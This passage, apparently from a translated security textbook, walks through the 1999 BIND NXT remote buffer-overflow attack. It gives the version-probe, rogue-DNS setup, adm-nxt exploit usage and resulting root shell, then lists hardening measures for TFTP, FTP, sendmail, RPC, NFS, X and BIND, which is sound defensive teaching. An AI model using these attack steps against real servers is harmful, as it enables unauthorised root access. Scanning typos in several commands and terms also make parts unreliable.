Методы удаленного взлома

7. Атаки на систему DNS

DNS является  одной из наиболее популярных  служб, используемых в Internet и  большинстве корпоративных интрасетей. Как и следовало ожидать, такое  широкое распространение службы DNS оказалось одной из причин  многочисленных атак на эту  систему. Взломщики постоянно  пытаются воспользоваться слабыми  местами одной из наиболее  стандартной реализации службы DNS системы UNIX— пакета BIND (Berkeley Internet Name Domain). Кроме того, DNS является одной  из нескольких служб, которые  практически всегда оказываются  необходимыми и функционируют  по всему периметру корпоративной  сети, обеспечивая доступ к Internet. Таким образом, любая ошибка  службы DNS практически всегда приводит  к возможности удаленного проникновения  (зачастую с привилегиями root). В  одном из отчетов по вопросам  безопасности, который был опубликован  в 1999 году и взбудоражил общественное  мнение, сообщалось, что более 50% всех соединенных с Internet серверов DNS уязвимы для атак взломщиков. Так что подобная опасность  абсолютна реальна. Соблюдайте  осторожность!  
Несмотря на то, что с пакетом BIND связано множество проблем обеспечения безопасности (http://www.cert.org/advisories/CA-98.05.bind_problems.html), мы сфокусируем все внимание на одной из последних и наиболее разрушительных атак. В ноябре 1999 года координационный центр CERT выпустил информационный бюллетень, в котором сообщалось о нескольких серьезных изъянах, обнаруженных в пакете BIND (http://www.cert.org/advisories/CA-99-14-bind.html). В Нем сообщалось о шести изъянах, среди которых наиболее опасным было удаленное переполнение буфера, возникающее при проверке пакетом BIND записей NXT. В результате переполнения буфера взломщик может выполнить на удаленном сервере любую команду с привилегиями root. Попробуем разобраться с основными принципами такой атаки.  
Для идентификации уязвимого сервера, на котором запущена программа named. большинство взломщиков прибегают к средствам автоматизации. Для того чтобы определить, имеются ли на вашем сервере DNS потенциально слабые места, необходимо провести дополнительную инвентаризацию. 

[ tsunami]# dig  
(§10.1.1.100 version.bind chaos txt 
«» DIG 8.1 «» 010.1.1.100 version.bind chaos txt 
(1 server found) 
res options: init recurs defnam dnsrch 
got answer: 
-»HEADER«- opcode: QUERY, status: NOERROR, id: 10 
flags: qr aa rd ra; QUERY: 1, ANSWER: 
1, AUTHORITY: 0, ADDITIONAL: 
QUERY SECTION: 
version.bind, type = TXT, class = CHAOS 
ANSWER SECTION: VERSION.BIND. OS CHAOS TXT"8.2.2"

В приведенном  фрагменте для определения используемой версии службы DNS демону named передается соответствующий запрос. Сейчас стоит  еще раз подчерктть важность процесса предварительного сбора данных. В  рассматриваемом примере на целевом  сервере DNS используется программа named версии 8.2.2, которая уязвима для  атак NXT. Для этой же атаки оказываются  уязвимыми также версии 8.2 и 8.2.1 этой программы.  
Для проведения такой атаки взломщик должен контролировать сервер DNS, связанный с удаленным доменом. На этом сервере DNS взломщику необходимо также создать поддомен, связанный с его собственным доменом. В данном примере предполагается, что сетью взломщика является attackers.org, поддомен называется hash и сервер DNS запущен на узле с именем quake. В данном случае взломщику необходимо добавить в файл /var /named/attackers, org. zone узла quake следующую запись, а затем перезапустить программу named с помощью интерфейса ndc. 

subdomain  IN  NS hash.attaokers.org. 

Следует помнить о том, что сервер DNS, контролируемый взломщиком, запущен на узле quake. 

После компиляции утилиты взлома, созданной  группой ADM (http: //packet storm.securify.com/9911-exploits/adm-nxt.с), ее нужно запустить с отдельного узла (tsunami), имеющего корректную архитектуру. Поскольку программа named используется в многих версиях UNIX, то утилитой adm-nxt поддерживаются следующие архитектуры. 

[tsunami]# adm-nxt 
Usage: adm-nxt architecture [command] 
Available architectures: 
1: Linux Redhat 6.x - named 8.2/8.2.1 (from rpm) 
2: Linux SolarDiz's non-exec  
stack patch - named 8.2/8.2.1 
3: Solaris 7 (Oxff) - named 8.2.1 
4: Solaris 2.6 - named 8.2.1 
5: FreeBSD 3.2-RELEASE - named 8.2 
6: OpenBSD 2.5 - named 8.2 
7: NetBSD 1.4.1 - named 8.2.1

После проведения предварительного сбора  данных с использованием утилиты  шпар стало известно, что на удаленном  узле используется система Red Hat 6.x. Таким  образом, для утилиты adm-nxt необходимо задать режим 1.[tsunami]# adm-nxt

После запуска утилита adm-nxt свяжется с UDP-портом 53 узла tsunami и будет ожидать установки  соединения с уязвимым сервером имен. На этом узле не нужно запускать  реальный сервер DNS, в противном случае утилита adm-nxt не сможет связаться с портом 53. Не следует забывать о том, что работа утилиты adm-nxt основывается на наличии целевого сервера имен, соединенного (или запрашивающего) с ложным сервером DNS, который на самом деле представляет собой утилиту взлома, прослушивающую UDP-порт 53. Как же взломщик может это реализовать? Очень просто. Для этого достаточно передать целевому серверу DNS запрос на получение некоторых данных с использованием команды nslookup. 

[quake]# nslookup 
Default Server:localhost.attackers.org 
Address: 127.0.0.1 
> server 10.1.1.100 
Default Server: dns.victim.net  
Address: 10.1.1.100 >  
hash.attackers.org 
Server: dns.victim.net 
Address: 10.1.1.100

Как видно  из приведенного листинга, взломщик запустил команду nslookup в интерактивном режиме на отдельном компьютере, находящемся  в его полном распоряжении. Затем  он перешел от использования сервера DNS, заданного по умолчанию, к  серверу-жертве с адресом 10.1.1.100. И наконец, взломщик запросил у взламываемого сервера DNS адрес поддомена hash.attackers.org. Это, в свою очередь, приведет к тому, что сервер dns.victim.net сгенерирует запрос к ложному серверу DNS, который прослушивает USP-порт 53. Как только целевой сервер установит соединение с узлом tsunami, на узле dns.victim.net утилитой adm-nxt будет сгенерировано переполнение буфера, в результате чего взломщик получит неограниченный доступ с привилегиями root, как показано ниже. 

[tsunami]# t666 I 
Received request from 10.1.1.100:53 for hash.attackers.org type=l 
id 
uid=0(root) gid=0(root) groups=0(root)

II. Контрмеры от часто используемых методов удаленного взлома

Защита TFTP

Убедитесь в том, что сервер TFTP ограничивает доступ к определенным каталогам, таким  как /tftpboot. Это воспрепятствует взломщикам получить важную информацию о конфигурации системы. Кроме того, рассмотрите  возможность реализации механизма  управления доступом на уровне всей сети в целом и на уровне отдельных  узлов, который запрещал бы несанкционированный  доступ к серверу TFTP.

Защита FTP

Хотя  протокол FTP очень полезен, необходимо помнить, что разрешение анонимного доступа к FTP-серверу может весьма пагубно сказаться на "самочувствии" вашего сервера. Оцените необходимость  использования FTP-сервера и определите, нужно ли предоставлять возможность  анонимного доступа. В таких случаях  для защиты сервера необходимо предпринять  специальные меры. Очень важно  установить самые последние версии модулей обновления, а также запретить  или как минимум oipami-чить количество каталогов, в которые разрешена  запись всем пользователям. А лучше  вовсе откажитесь от таких каталогов. 

Защита программы sendmail

Лучшим  методом защиты от попыток взлома sendmail является отказ от ее использования  во всех случаях, когда эта программа  не используется для получения почты  по сети. Если использовать sendmail все  же необходимо, обязательно убедитесь  в том, что в вашем распоряжении имеется ее самая свежая версия, в которой установлены все  модули обновления системы защиты. К другим мерам относится удаление из соответствующего файла всех псевдонимов. Исследуйте каждый псевдоним, который  указывает на программу, а не на учетную  запись пользователя. Кроме того, убедитесь, что разрешения, заданные для соответствующих  файлов, запрещают внесение в них  каких-либо изменений. Существуют дополнительные утилиты, призванные восполнить недостаточную защищенность sendmail. Такими утилитами, например, являются smap и smapd — программы, входящие в комплект поставки пакета TIS, который можно бесплатно получить по адресу http://www.tis.com/research/software. Утилита smap используется для безопасного получения сообщений по сети и их размещения в специально выделенном каталоге. Утилита smapd периодически проверяет этот каталог и доставляет почту адресатам, используя для этого sendmail или какую-либо другую программу. Данный подход позволяет разорвать связь между sendmail и нелегальными пользователями, поскольку все соединения для получения почты устанавливает утилита smap, а не sendmail. Наконец, можно перейти к использованию более надежного агента МТА, такого как qmail. Программа qmail, написанная Дэном Бернштейном (Dan Bernstein),  представляет собой современный эквивалент sendmail. Одной из основных целей создания программы qmail было обеспечение безопасности при работе с электронной почтой, и в настоящее время она пользуется очень хорошей репутацией

Кроме вышеупомянутых изъянов, программа sendmail зачастую неправильно конфигурируется, что позволяет с ее помощью рассылать спам. В программе sendmail версии 8.9 и выше реализованы функции, предотвращающие ее использование для таких целей.

Защита служб RFC

Лучшим  методом защиты от удаленных атак является отключение всех служб RPC, в  использовании которых нет острой необходимости. Если же какая-то служба RPC очень важна для работы сервера, подумайте над установкой какого-либо устройства управления доступом, с  помощью которого связь с необходимыми портами RPC можно было бы разрешить  только строго определенным узлам. В  некоторых случаях эта задача может оказаться весьма непростой. Подумайте также над включением режима, запрещающего выполнение стека, если такой режим поддерживается вашей операционной системой. Наконец. попробуйте использовать Secure RPC, если имеющаяся  в вашем распоряжении версия UNIX поддерживает такие средства. Secure RPC обеспечивает дополнительный уровень аутентификации, основанной на шифровании по открытому  ключу. Помните, что Secure RPC — это не панацея, поскольку многие разработчики UNIX не поддерживают этого протокола. Другими словами, при использовании  протокола Secure RPC повышается безопасность, но под угрозой может оказаться  взаимодействие. Наконец, убедитесь  в том, что установлены все  самые последние модули обновления, разработанные поставщиком используемой вами системы.

Защита  системы NFS

Если  нет острой необходимости в использовании  системы NFS, то ее, а также и все  связанные с ней службы (например, mountd, statd и lockd) необходимо отключить. Реализуйте механизм управления доступом, который позволил бы получать доступ к нужным файлам только санкционированным пользователям. Обычно экспортом файловых систем и включением соответствующих параметров управления доступом управляют конфигурационные файлы /etc/exports, /etc/dfs/dfstab и т.д. Некоторые параметры управления доступом позволяют задать имена компьютеров или групп, которым разрешен доступ, установить доступ только для чтения или запретить установку флага SUID. В каждой реализации системы NFS имеются небольшие различия, поэтому более подробную информацию об используемой версии поищите в документации или в справочной системе. Кроме того, никогда не включайте локальный IP-адрес сервера (или localhost) в список систем, которым разрешено монтировать файловую систему. Более старые версии службы portmapper позволяют взломщикам подключаться через proxy-серверы, работающие в интересах этих взломщиков. Если системе было разрешено монтировать экспортируемую файловую систему, взломщики могут отправить пакеты NFS службе portmapper взламываемой системы, что, в свою очередь, приведет к пересылке запроса на localhost. Такой запрос будет выглядеть так, словно он поступил с доверенного узла, что позволит ему обойти соответствующие правила управления доступом. Как всегда, в качестве последней по порядку (но не по значимости!) меры, советуем установить все модули обновления, предлагаемые разработчиками программного обеспечения. 

Защита системы X

Сделайте  все возможное, чтобы избежать использования  команды xhost +. He ленитесь, помните о  безопасности! Если вы не можете пойти  на столь радикальные меры, тогда  хотя бы применяйте команду xhost -, которая  запрещает новые подключения, однако позволяет функционировать уже  имеющимся. Если вы должны разрешить  удаленный доступ к вашему Х-серверу, обязательно указывайте IP-адрес  каждого сервера, которому разрешен доступ. Никогда не забывайте о  том, что любой пользователь такого сервера может скрытно подключиться к вашему Х-серверу. Среди других мер по обеспечению безопасности можно выделить применение более  серьезного механизма аутентификации, такого как MIT-MAGIC-COOKIE-1, XDM-AUTHORIZATION-1 и MIT-KERBEROS-5. Эти механизмы обеспечивают довольно высокий уровень защиты при подключении  к Х-серверу. Если вы используете  программу xterm или аналогичный терминал, включите режим Secure Keyboard. Это позволит запретить любому процессу перехватывать  нажатия клавиш. Кроме того, подумайте  о том, чтобы блокировать доступ извне к портам 6000-6063 на уровне брандмауэра с целью запретить несанкционированным пользователям подключаться к портам Х-сервера. И наконец, воспользуйтесь защищенной оболочкой ssh и ее возможностями по повышению уровня защиты сеансов X. Убедитесь, что в файле sshd_config или sshd2_config для параметра ForwardXll установлено значение yes.

Защита службы DNS

Первое  и самое главное — отключите  и удалите пакет BIND на всех узлах, которые не используются в качестве сервера DNS. Во многих версиях системы UNIX (особенно Linux) программа named автоматически  запускается при начальной загрузке компьютера, несмотря на то, что она  никогда не используется. Во-вторых, удостоверьтесь в том, что используется текущая версия пакета BIND, в состав которой входят модули обновления подсистемы защиты (www.bind.org). В-третьих, запускайте программу named с правами непривилегированного пользователя. Другими словами, программа named должна запускаться с привилегиями root только для связывания с портом 53. После этого эти привилегии нужно понизить с использованием параметра -u (named -и dns -g dns). И наконец, программа named должна запускаться с  использованием параметра -t из среды chrooted() (named -u dns -g dns -t /home/dns). Это поможет  предотвратить попытки взломщика, связанные с обходом файловой системы и в том случае, если им был получен доступ. Даже если все перечисленные меры защиты решат  поставленную задачу, не стоит успокаиваться  на достигнутом. Безопасности сервера DNS необходимо постоянно уделять  самое пристальное внимание.